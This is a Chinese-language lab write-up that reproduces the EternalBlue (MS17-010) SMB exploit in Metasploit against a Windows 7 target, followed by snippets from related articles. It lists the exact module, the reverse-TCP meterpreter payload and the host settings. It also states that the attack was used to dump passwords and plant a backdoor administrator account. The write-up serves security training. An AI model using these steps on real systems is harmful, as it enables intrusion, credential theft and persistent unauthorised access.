EternalBlue永恒之蓝漏洞复现

EternalBlue漏洞复现

1.    实训目的

永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。学习漏洞原理掌握攻击方法。

2. 实训原理

  • 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
  • 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无由于永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码

3. 实训环境

  1. Kali系统  版本:2.0   IP:192.168.0.145
  2. Win7系统           IP:192.168.0.130   开放端口:445
  3. MSF框架版本:4.14.17版本以上
  4. 安装更新metasploit

4. 实训步骤

查看MSF框架版本

在终端输入msfconsole,进入界面如图1所示。

图1

在进行实验时查看数据库连接和配置如图2所示。

图2

搜索ms17_010图3所示。

                         

图3

扫描命令use auxiliary/scanner/smb/smb_ms17_010
攻击命令use exploit/windows/smb/ms17_010_eternalblue

如图4所示

                                                                            

图4

加载攻击模块并配置参数

use
exploit/windows/smb/ms17_010_eternalblue

set payload
windows/x64/meterpreter/reverse_tcp

set rhost
192.168.122.130 (靶机的IP)

set lhost 192.168.122.145(发起攻击的主机IP)

set lport
443

图5

发起攻击,成功会反弹shell

输入run或者exploit,结果如图6所示。

                         

图6

获取系统管理密码信息如图7所示。

图7

反弹shell, 种植后门创建一个用户,并查看如图8所示。

  

图8

加入管理员用户并查看,如图9所示。

图9

创建txt文件,并在kali里截取。如图10所示。

图10

远程登录如图13所示。

                       

图13

本次实验主要是利用永恒之蓝漏洞攻击一台主机,掌握永恒之蓝漏洞原理。

原文地址:https://www.cnblogs.com/ls-pankong/p/12147983.html

时间: 2024-10-06 07:53:51

EternalBlue永恒之蓝漏洞复现的相关文章

ms17-010永恒之蓝病毒复现

1       永恒之蓝漏洞复现(ms17-010) 1.1     漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件.远程控制木马.虚拟货币挖矿机等恶意程序. 1.2     漏洞影响: 目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000.Windows XP

永恒之蓝漏洞利用复现

一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗舰版 需安装python2.6.6&pywin32 攻击机 192.168.0.245 kali linux 2.0 生成reverse shell的dll文件 辅助机 二.攻击流程: 攻击流程图解: 1.在kali linux中利用metasploit生成用于建立反向链接的dll文件 msfven

一个利用“永恒之蓝”漏洞传播的挖矿程序分析

背景介绍 近日,渔村安全团队追踪到一个利用永恒之蓝漏洞传播的挖矿程序,其具备高度的模块化和较强的传播能力,在短短数日就感染了数万台用户电脑.针对该突发情况,渔村安全团队迅速组织应急工作,最终使得目前的感染情况受到控制,下文为样本分析. 感染量 从微软发布ms17-010(永恒之蓝漏洞) 的修复补丁到现在已经过去四个月了,相继爆发的利用该漏洞传播的WannaCry,Petya 勒索病毒更是给 我们 上了一课.但目前来看,还是有不少用户没有及时更新补丁或者做相应的缓解措施,同时 Shadow Bro

关于永恒之蓝漏洞的补丁跟踪及实施记录

前言:利用MS17-010 漏洞进行攻击的蠕虫病毒已经成了自上周末到现在的主要任务,当组织里面有大量的机器时,要在短时间内完成大量业务系统的防护和更新需要耗费大量的人力和资源.当然如果手段和方式得力,事情相对会顺利的多. 目标: 1. 获得所有机器关于MS17-010 的补丁更新情况,MS17-10 针对window 7\windows 2008 r2及以上版本的补丁其实在3月份已经下发了,而对于失去支持的winxp,windows server 2003 等机器的特别补丁(KB4012598)

永恒之蓝 MS17-010漏洞复现

漏洞原理 简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码.注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无,SMB服务详解:点击查看 漏洞原理代码详解 下面两篇文章从实际代码详细分析了漏洞原理,想要从代码详细理解该漏洞的同学可以点击查看 http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772https:/

ms17_010(永恒之蓝)漏洞复现详细教程

如题,这是个漏洞复现的详细教程,本教程针对的系统是Windows7操作系统,其他系统请自行测试. 备注:教程会很详细,讲解会很明白,一文可以解决你的常见困难. 测试环境 kalilinux 192.168.1.109 (主机) windows7 192.168.1.104 (虚拟机) 开始 首先使用 nmap 命令扫描局域网内的所有主机(因为ms17_010漏洞的最基本要求是需要开启445端口),这里使用nmap的最基本的扫描,直接命令后跟ip,nmap 192.168.1.1/24(扫描整个局

[Shell]CVE-2019-0708漏洞复现及修复补丁

0x01 漏洞原理 Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003.windows2008.windows2008 R2.windows 7系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的. 这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多. CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命

“永恒之蓝”第二弹-Security Update补丁全家桶地址汇总(一)

MS17-010即Windows SMB 服务器安全更新,是微软于2017年3月14日推出的安全更新,此安全更新修复了 Microsoft Windows 中的漏洞. 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行.有关该漏洞的更多信息,请参阅微软官链:https://technet.microsoft.com/zh-cn/library/security/MS17-010 下列文章包含此安全更新针对具体

永恒之蓝病毒事件所引发的运维安全行业新思考

一.NSA "永恒之蓝" 勒索蠕虫全球爆发 2017年5月12日爆发的 WannaCry勒索病毒肆虐了全球网络系统,引起各国企业和机构极大恐慌.而这次受害最严重的是Windows系统,自然也被锁定为怀疑对象,有人认为正是因为该系统对于漏洞的麻木和疏漏才导致了此次勒索病毒的蔓延.作为受害者的微软却将矛头指向美国国安局(NSA)和永恒之蓝.不法分子利用永恒之蓝漏洞攻击Windows系统,造成系统锁定,从而进行勒索,否则将删除所有信息 就WannaCry勒索病毒呈现的特征而言,面对新时期网络